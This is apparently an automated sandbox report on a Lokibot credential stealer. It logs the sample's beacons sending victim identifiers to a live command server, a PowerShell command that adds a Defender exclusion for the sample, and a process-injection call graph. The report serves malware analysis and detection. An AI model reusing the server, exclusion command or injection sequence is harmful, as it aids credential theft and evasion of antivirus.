                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:11.940390110 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:13.393899918 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:13 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.44997694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:13.660808086 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:13.780404091 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:15.065463066 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:14 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.44998194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:15.336205959 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:15.455771923 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:16.777442932 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:16 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.44998494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:17.046169043 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:17.167830944 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:18.529325008 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:18 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.44999094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:18.804296017 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:18.923856974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:20.330070019 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:20 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.2.44999594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:20.753468990 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:20.873101950 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:22.279743910 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:22 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.2.45000094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:22.549735069 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:22.672655106 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:24.138025999 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:23 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:11:38:15
                                                                          Start date:22/11/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x1f0000
                                                                          File size:600'576 bytes
                                                                          MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:11:38:18
                                                                          Start date:22/11/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x310000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:11:38:18
                                                                          Start date:22/11/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0xbf0000
                                                                          File size:600'576 bytes
                                                                          MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.3131214970.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:4
                                                                          Start time:11:38:18
                                                                          Start date:22/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:11:38:20
                                                                          Start date:22/11/2024
                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                          Imagebase:0x7ff693ab0000
                                                                          File size:496'640 bytes
                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:10.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:185
                                                                            Total number of Limit Nodes:11
                                                                            execution_graph 33038 6744ad4 33039 6744ae4 33038->33039 33043 67471c0 33039->33043 33047 67471b0 33039->33047 33040 6744b0b 33044 67471f3 33043->33044 33051 674471c 33044->33051 33046 674721d 33046->33040 33048 67471be 33047->33048 33049 674471c ResumeThread 33048->33049 33050 674721d 33049->33050 33050->33040 33052 67473d8 33051->33052 33053 6747506 33052->33053 33054 67475b7 ResumeThread 33052->33054 33053->33046 33054->33052 32860 6748375 32864 67491e0 32860->32864 32869 67491d0 32860->32869 32861 67482f9 32865 67491f5 32864->32865 32874 6749275 32865->32874 32880 6749212 32865->32880 32866 6749207 32866->32861 32870 67491e0 32869->32870 32872 6749275 13 API calls 32870->32872 32873 6749212 13 API calls 32870->32873 32871 6749207 32871->32861 32872->32871 32873->32871 32875 674920c 32874->32875 32877 6749280 32875->32877 32885 6749570 32875->32885 32899 6749561 32875->32899 32876 674925e 32876->32866 32877->32866 32881 674923a 32880->32881 32883 6749570 13 API calls 32881->32883 32884 6749561 13 API calls 32881->32884 32882 674925e 32882->32866 32883->32882 32884->32882 32886 6749585 32885->32886 32913 6749c7f 32886->32913 32918 67499bf 32886->32918 32925 67499fd 32886->32925 32930 6749e63 32886->32930 32934 6749682 32886->32934 32940 6749a40 32886->32940 32945 67497f0 32886->32945 32952 6749bb5 32886->32952 32958 6749824 32886->32958 32962 67496f9 32886->32962 32968 6749d8f 32886->32968 32887 6749597 32887->32876 32900 6749570 32899->32900 32902 6749824 2 API calls 32900->32902 32903 6749bb5 3 API calls 32900->32903 32904 67497f0 4 API calls 32900->32904 32905 6749a40 2 API calls 32900->32905 32906 6749682 2 API calls 32900->32906 32907 6749e63 2 API calls 32900->32907 32908 67499fd 2 API calls 32900->32908 32909 67499bf 3 API calls 32900->32909 32910 6749c7f 2 API calls 32900->32910 32911 6749d8f 2 API calls 32900->32911 32912 67496f9 2 API calls 32900->32912 32901 6749597 32901->32876 32902->32901 32903->32901 32904->32901 32905->32901 32906->32901 32907->32901 32908->32901 32909->32901 32910->32901 32911->32901 32912->32901 32914 6749c01 32913->32914 32915 6749968 32914->32915 32972 6747c30 32914->32972 32976 6747c28 32914->32976 32915->32887 32919 67499de 32918->32919 32920 6749fca 32919->32920 32980 67475b7 32919->32980 32984 67475a8 32919->32984 32988 67475b0 32919->32988 32920->32887 32921 6749be5 32921->32887 32926 6749a06 32925->32926 32928 6747c30 WriteProcessMemory 32926->32928 32929 6747c28 WriteProcessMemory 32926->32929 32927 6749f7d 32928->32927 32929->32927 32992 6747a92 32930->32992 32996 6747a98 32930->32996 32931 6749e7d 32935 674968c 32934->32935 32936 67496f0 32935->32936 33000 6747ead 32935->33000 33004 6747eb8 32935->33004 32936->32887 32941 6749cdf 32940->32941 33008 6747d18 32941->33008 33012 6747d20 32941->33012 32942 674975f 32942->32887 33016 6747b70 32945->33016 33020 6747b68 32945->33020 32946 674980e 32947 6749968 32946->32947 32950 6747c30 WriteProcessMemory 32946->32950 32951 6747c28 WriteProcessMemory 32946->32951 32947->32887 32950->32946 32951->32946 32953 6749bd0 32952->32953 32955 67475b7 ResumeThread 32953->32955 32956 67475b0 ResumeThread 32953->32956 32957 67475a8 ResumeThread 32953->32957 32954 6749be5 32954->32887 32955->32954 32956->32954 32957->32954 32960 6747a92 Wow64SetThreadContext 32958->32960 32961 6747a98 Wow64SetThreadContext 32958->32961 32959 674983e 32959->32887 32960->32959 32961->32959 32963 674968c 32962->32963 32964 6749675 32962->32964 32963->32964 32966 6747ead CreateProcessA 32963->32966 32967 6747eb8 CreateProcessA 32963->32967 32964->32887 32965 6749734 32965->32887 32966->32965 32967->32965 32970 6747c30 WriteProcessMemory 32968->32970 32971 6747c28 WriteProcessMemory 32968->32971 32969 6749bae 32970->32969 32971->32969 32973 6747c78 WriteProcessMemory 32972->32973 32975 6747ccf 32973->32975 32975->32914 32977 6747c30 WriteProcessMemory 32976->32977 32979 6747ccf 32977->32979 32979->32914 32981 67475f0 ResumeThread 32980->32981 32983 6747621 32981->32983 32983->32921 32985 67475b0 ResumeThread 32984->32985 32987 6747621 32985->32987 32987->32921 32989 67475f0 ResumeThread 32988->32989 32991 6747621 32989->32991 32991->32921 32993 6747a98 Wow64SetThreadContext 32992->32993 32995 6747b25 32993->32995 32995->32931 32997 6747add Wow64SetThreadContext 32996->32997 32999 6747b25 32997->32999 32999->32931 33001 6747f41 CreateProcessA 33000->33001 33003 6748103 33001->33003 33003->33003 33005 6747f41 CreateProcessA 33004->33005 33007 6748103 33005->33007 33007->33007 33009 6747d20 ReadProcessMemory 33008->33009 33011 6747daf 33009->33011 33011->32942 33013 6747d6b ReadProcessMemory 33012->33013 33015 6747daf 33013->33015 33015->32942 33017 6747bb0 VirtualAllocEx 33016->33017 33019 6747bed 33017->33019 33019->32946 33021 6747b70 VirtualAllocEx 33020->33021 33023 6747bed 33021->33023 33023->32946 33094 4b14040 33095 4b14082 33094->33095 33097 4b14089 33094->33097 33096 4b140da CallWindowProcW 33095->33096 33095->33097 33096->33097 33098 674a440 33099 674a5cb 33098->33099 33101 674a466 33098->33101 33101->33099 33102 6744818 33101->33102 33103 674a6c0 PostMessageW 33102->33103 33104 674a72c 33103->33104 33104->33101 33024 246ac10 33025 246ac1f 33024->33025 33028 246acf8 33024->33028 33033 246ad08 33024->33033 33029 246ad3c 33028->33029 33030 246ad19 33028->33030 33029->33025 33030->33029 33031 246af40 GetModuleHandleW 33030->33031 33032 246af6d 33031->33032 33032->33025 33034 246ad19 33033->33034 33035 246ad3c 33033->33035 33034->33035 33036 246af40 GetModuleHandleW 33034->33036 33035->33025 33037 246af6d 33036->33037 33037->33025 33055 246cfa0 33056 246cfe6 33055->33056 33060 246d578 33056->33060 33063 246d588 33056->33063 33057 246d0d3 33066 246d1dc 33060->33066 33064 246d5b6 33063->33064 33065 246d1dc DuplicateHandle 33063->33065 33064->33057 33065->33064 33067 246d5f0 DuplicateHandle 33066->33067 33068 246d5b6 33067->33068 33068->33057 33069 6744c9e 33070 6744a98 33069->33070 33070->33069 33072 67471c0 ResumeThread 33070->33072 33073 67471b0 ResumeThread 33070->33073 33071 6744fe3 33072->33071 33073->33071 33074 2464668 33075 2464672 33074->33075 33077 2464758 33074->33077 33078 246477d 33077->33078 33082 2464858 33078->33082 33086 2464868 33078->33086 33084 246488f 33082->33084 33083 246496c 33083->33083 33084->33083 33090 24644b0 33084->33090 33088 246488f 33086->33088 33087 246496c 33087->33087 33088->33087 33089 24644b0 CreateActCtxA 33088->33089 33089->33087 33091 24658f8 CreateActCtxA 33090->33091 33093 24659bb 33091->33093

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 294 4b16fe8-4b1710d call 4b16ba0 * 2 call 4b16bb0 * 2 call 4b16bc0 call 4b16bd4 512 4b17110 call 4b1ff10 294->512 513 4b17110 call 4b1ff40 294->513 324 4b17113-4b17393 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16c24 call 4b16c34 358 4b17399-4b173ac 324->358 359 4b174df-4b17501 324->359 360 4b173b5-4b173de 358->360 361 4b173ae-4b173b4 358->361 369 4b17503-4b17509 359->369 370 4b1750f-4b17569 359->370 362 4b17c93-4b17cb9 360->362 363 4b173e4-4b17401 360->363 361->360 514 4b17cbe call 2465ca4 362->514 515 4b17cbe call 246826a 362->515 363->362 365 4b17407-4b1741c 363->365 365->362 367 4b17422-4b1744b call 4b16c44 365->367 367->362 377 4b17451-4b1747a 367->377 372 4b1750b 369->372 373 4b1750d 369->373 370->362 392 4b1756f-4b1757d 370->392 372->370 373->370 375 4b17cc3-4b17d83 call 4b16d24 call 4b16d34 378 4b1747c 377->378 379 4b1747f-4b1748b 377->379 378->379 379->362 382 4b17491-4b174a7 379->382 382->362 385 4b174ad-4b174c0 382->385 385->362 387 4b174c6-4b174d9 385->387 387->358 387->359 392->362 396 4b17583-4b1761f 392->396 413 4b17628-4b17c92 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16c54 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c14 call 4b16c64 call 4b16c74 call 4b16c84 call 4b16be4 call 4b16bf4 call 4b16c04 call 4b16c94 call 4b16ca4 call 4b16cb4 call 4b16cc4 call 4b16cd4 call 4b16ce4 * 6 call 4b16cf4 call 4b16d04 call 4b16bf4 call 4b15480 call 4b16d14 396->413 512->324 513->324 514->375 515->375
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1897178840.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4b10000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $&$&$7$9$=$C$E$E$_$j$x$$dq
                                                                            • API String ID: 0-452711968
                                                                            • Opcode ID: e048b78e223945752e3667ead2ed13a12f33704cf5342f1aac17a39e970c4c69
                                                                            • Instruction ID: 04d228f6788ec4ee0ce48c22b4129a27a23dc9688c3c9d0195e200aa834c60cd
                                                                            • Opcode Fuzzy Hash: e048b78e223945752e3667ead2ed13a12f33704cf5342f1aac17a39e970c4c69
                                                                            • Instruction Fuzzy Hash: 16825A30A00705CFDB15EF78C854BAAB7B2FF89304F5186A9D449AB364DB75A985CF80

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
